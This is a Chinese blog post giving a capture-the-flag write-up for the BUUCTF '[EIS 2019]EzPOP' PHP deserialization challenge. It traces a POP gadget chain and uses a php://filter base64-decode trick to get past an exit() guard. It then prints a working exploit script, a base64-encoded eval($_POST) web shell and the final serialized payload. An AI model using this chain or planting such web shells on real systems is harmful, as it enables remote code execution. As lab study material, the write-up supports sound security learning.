[EIS 2019]EzPOP

最新推荐文章于 2023-03-31 01:48:05 发布
最新推荐文章于 2023-03-31 01:48:05 发布
阅读量354 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全 phpfilter绕过exit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/126886249
版权 
知识点:file_put_contents用php://filter绕过exit,代码审计

分析

遇到这种代码审计,一种是找个入口往下推,另一种是从可利用处往上推,像这题只有一个文件,可以利用的地方比较明显,虽然代码很长,我们可以从可利用处往上推。

可以利用file_put_contents写入文件,再看看两个参数是怎么控制的。

$result = file_put_contents($filename, $data);

$filename文件名,往代码上面找找,可以看到是由getCacheKey函数返回,且传了一个$name参数,那这参数是哪的?先不着急找,先看下$data参数是怎么生成的

$filename = $this->getCacheKey($name);

public function getCacheKey(string $name): string {
        return $this->options['prefix'] . $name;
    }

$data是由serialize($value)返回的,且再serialize方法里$serialize值为一个数组,而且返回的是一个动态函数调用,这边我们可以对$database64加密,然后调用base64解密一下就行了,return base64_decode($data);

protected function serialize($data): string {   
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);                   //动态调用
    }

$data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {//可绕过
            //数据压缩
            $data = gzcompress($data, 3); //压缩
        }

但是再传入前,又对$data前连了一个exit,这样就执行不到我们的shell了,所以我们要处理一下,把文件名改一下php://filter/write=convert.base64-decode/resource=cmd.php(详解:https://www.leavesongs.com/PENETRATION/php-filter-magic.html),所以我们应该在shell前加三个字符,因为base64是四个字符一组解密。

$data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
//base64可解密的字符php//000000000000exit

通过上面的这些分析,可以大概列一些属性。

<?php
$data = "aaa".base64_encode("<?php @eval($_POST['cmd']);?>");
$data = base64_encode($data);
options['data_compress'] = 0;
options['serialize'] = base64_decode;
options['prefix'] = "php://filter/write=convert.base64-decode/resource=";
$name = "cmd.php";

接下来就是细化了,我们可以从a类的save函数里看到set函数的调用,然后找链子:

__destruct  -> save ->getForStorage -> cleanContents
然后return json_encode([$cleaned, $this->complete]); -> $this->store->set($this->key, $contents, $this->expire);

从中可以看出

$filename = $this->getCacheKey($name);里面的$name是a类里的key,
$data = $this->serialize($value);里的$value是a类里的complete,
而a类里的$cleaned是由一个可控的cache传入cleanContents里返回得到的,可以令cache为一个空数组。

class Apublic function cleanContents(array $contents) {
			return $contents;
	}
	public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);  //cache可控

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }

exp

<?php
class A {
    protected $store;
    protected $key;
    protected $expire;
    public function __construct(){
        $this->store = new B();
        $this->key = 'cmd.php';
        $this->cache = array();
        $this->autosave = 0;
        $this->complete = 'YWFhUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lkamJXUW5YU2s3SUQ4Kw==';
    }
}

class B {
    public $option = array();
    public function __construct(){
        $this->options['serialize'] = 'base64_decode';
        $this->options['data_compress'] = false;
        $this->options['prefix'] = 'php://filter/write=convert.base64-decode/resource=';
    }
}
$a = new A();
echo urlencode(serialize($a));

最后传入反序列化值,再用蚁剑连一下。

?data=O%3A1%3A%22A%22%3A6%3A%7Bs%3A8%3A%22%00%2A%00store%22%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A6%3A%22option%22%3Ba%3A0%3A%7B%7Ds%3A7%3A%22options%22%3Ba%3A3%3A%7Bs%3A9%3A%22serialize%22%3Bs%3A13%3A%22base64_decode%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A50%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3D%22%3B%7D%7Ds%3A6%3A%22%00%2A%00key%22%3Bs%3A7%3A%22cmd.php%22%3Bs%3A9%3A%22%00%2A%00expire%22%3BN%3Bs%3A5%3A%22cache%22%3Ba%3A0%3A%7B%7Ds%3A8%3A%22autosave%22%3Bi%3A0%3Bs%3A8%3A%22complete%22%3Bs%3A60%3A%22YWFhUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lkamJXUW5YU2s3SUQ4Kw%3D%3D%22%3B%7D
succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[2019EIS高校运维赛]ezupload
xlcvv的博客
04-17 3133
ezupload ezbypass 一、ezupload 先来一个之前的思路 随意输入username和oassword: 又试了一下万能密码,也是login failed,那就想到了sql注入,抓包另存为txt文件: 用username做注入点,失败。看了大佬的wp后才知道,网页源码下有个小提示: 下载下来,是个swp文件: swp文件是文件在编辑的过程中,由于不正当结束,会存在修...
EIS电路拟合AZSimDemo
06-07
EIS电路拟合AZSimDemo,非常好用,
EIS2019-EzPOP
ro4lsc的博客
05-14 1388
做了这个题目,我收回我之前的话,我又懵逼了,不知道如何下手,还是自己的基础不够扎实,没关系,奥利给,淦!
ESET EIS 64位安装包
01-07
ESET EIS 64位版本离线安装包,安装包下载于2019-1-7日,需要准备序列号
eis
04-01
埃斯
eis.rar_eis_eis group 如何?
09-24
Discuz!模板 适用版本: Discuz! X2 语言编码: GBK简体 风格转换者: 原创 ...离开的人怀念这里的热干面,精武鸭,还有这里的人和事,Eis_010城市空间Discuz!X2.0模板发布,想想你怀念的是哪座城市呢?
EIS_PANKAJ
03-21
EIS_PANKAJ
[BUUCTF][EIS 2019]EzPOP
cosmoslin的博客
02-07 357
[EIS 2019]EzPOP <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store
序列化与反序列化——[EIS 2019]EzPOP
LSYZWF的博客
11-06 339
文章目录题目解答 题目 链接:https://buuoj.cn/challenges#[EIS%202019]EzPOP 解答 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) {
[EIS 2019]EzPOP 代码审查
qq_54929891的博客
05-08 361
源码 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flag.php', $expire = null) { $this->key = $key; $this->store = $store;
[EIS 2019]EzPOP 完整题解
qq_38338511的博客
03-31 236
这样就可以把我们传进去的$data进行解码了,上面做了演示用base64加密后再解密的一句话马儿可以忽略json_encode输出我们想要的值,这里就不能用上次的UCS-2编码和str_rot13编码方式了,因为有json_encode会乱码,学会本地测试活学活用!把$key传入了B类的set()方法的$name->最终传入了B类的set()方法的$filename。把$contents返回到了save()的$value->最终传入了B类的set()方法的$data。接着看进入B类的set()方法。
[EIS 2019]EzPOP-PHP代码审计学习
cjdgg的博客
03-09 285
[EIS 2019]EzPOP-PHP代码审计学习 作为一个不太聪明的WEB安全菜鸟,代码审计一直不咋地,正好遇到一道题,记录一下学习过程 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) {
[EIS2019]EzPOP--反序列化题目
Dream'
06-19 958
题目地址:https://buuoj.cn/challenges#[EIS%202019]EzPOP 发现代码中可利用点只有file_put_contents($filename, $data) ,所以我们从它开始倒推我们需要分别找到$data的链和$filename的链使options['data_compress']=false,不让$data压缩data来自value,$data = $this->serialize($value);,使options['serialize']=trim,这样se
BUUCTF__[EIS 2019]EzPOP_题解
风过江南乱的博客
04-28 940
BUUCTF__[EIS 2019]EzPOP_题解 php反序列化
EIS 2019——misc3
pigredfive的博客
11-29 310
题目截图: 打开网页,有下载链接,下载下来一个html文件,打开: 解题过程: 一个html文件,可以考虑按F12来看一下源代码里面有没有flag。 找到一堆由Unicode编码格式的 (&zwnj ; )(&#8203 ; ) 这两个字符可以考虑用0,1替换掉,然后二进制转ascii。先考虑 (&zwnj ; )为0,(&#8203 ; )为1 的情况: ...
eis spectrum analyzer
最新发布
11-29
EIS谱分析仪是一种用于分析电化学阻抗谱的仪器。EIS代表电化学阻抗谱,它测量电化学系统中的电流和电压响应,以了解系统的电化学特性和界面的行为。 EIS谱分析仪是通过施加幅度和频率变化的正弦交流电信号来进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值